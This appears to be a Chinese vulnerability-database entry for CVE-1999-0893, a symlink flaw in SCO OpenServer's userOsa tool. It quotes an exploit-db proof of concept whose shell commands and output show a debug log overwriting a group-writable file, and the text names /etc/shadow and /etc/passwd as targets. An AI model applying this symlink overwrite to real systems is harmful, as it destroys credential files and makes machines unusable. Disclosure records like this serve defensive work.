SCO OpenServer userOsa损坏文件漏洞

SCO OpenServer userOsa损坏文件漏洞

漏洞ID 1105566 漏洞类型 未知
发布时间 1999-10-11 更新时间 2005-05-02
图片[1]-SCO OpenServer userOsa损坏文件漏洞-安全小百科CVE编号 CVE-1999-0893
图片[2]-SCO OpenServer userOsa损坏文件漏洞-安全小百科CNNVD-ID CNNVD-199910-027
漏洞平台 SCO CVSS评分 2.1
|漏洞来源
https://www.exploit-db.com/exploits/19542
http://www.cnnvd.org.cn/web/xxk/ldxqById.tag?CNNVD=CNNVD-199910-027
|漏洞详情
SCOOpenServer中的userOsa存在漏洞。本地用户通过一个符号链接攻击去损坏文件。
|漏洞EXP
source: http://www.securityfocus.com/bid/701/info

Under certain versions of SCO OpenServer there exists a symlink vulnerability which can be exploited to overwrite any file which is group writable by the 'auth' group. The problem in particular is in the the /etc/sysadm.d/bin/userOsa executable. When given garbage output the program will write out a debug log. However, the program does not check to see if it overwriting a currently existing file nor wether it is following a symlink. Therefore is it possible to overwrite files with debug data which are both in the 'auth' group and are writable by the same group. Both /etc/shadow & /etc/passwd fall into this category. If such an attack were launched against these files the system would be rendered unusable.

scohack:/tmp$ ln -s /etc/shadow.old debug.log
scohack:/tmp$ /etc/sysadm.d/bin/userOsa
bah
connectFail {{SCO_LOCAL_PIPE_ERR_INVALID_CONNECT_REQ {Invalid Connect
Request: bah}}}
Failed to listen to client
Failure in making connection to OSA.
scohack:/tmp$

-----

BEFORE EXPLOIT:
scohack:/# l /etc/shadow.old
-rw-rw---- 1 root auth 26 Oct 11 20:08 /etc/shadow.old

AFTER EXPLOIT (note the file size):
scohack:/# l /etc/shadow.old
-rw-rw---- 1 root auth 177 Oct 11 20:10 /etc/shadow.old

scohack:/# cat /etc/shadow.old
>>> Debug log opened at Mon Oct 11 03:10:04 PM CDT 1999 by <PID=11604>
<<<
SendConnectFail(connectFail {{SCO_LOCAL_PIPE_ERR_INVALID_CONNECT_REQ
{Invalid Connect Request: bah}}})

scohack:/#
|参考资料
VulnerablesoftwareandversionsConfiguration1OR*cpe:/o:sco:openserver:5.0*DenotesVulnerableSoftware*ChangesrelatedtovulnerabilityconfigurationsTechnicalDetailsVulnerabilityType(ViewAll)CVEStandardVulnerabilityEntry:http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-1999-0893

相关推荐: Qualcomm Qpopper Unsafe fgets() Vulnerability

Qualcomm Qpopper Unsafe fgets() Vulnerability 漏洞ID 1104212 漏洞类型 Input Validation Error 发布时间 2000-04-21 更新时间 2000-04-21 CVE编号 N/A C…

© 版权声明
THE END
喜欢就支持一下吧
点赞0
分享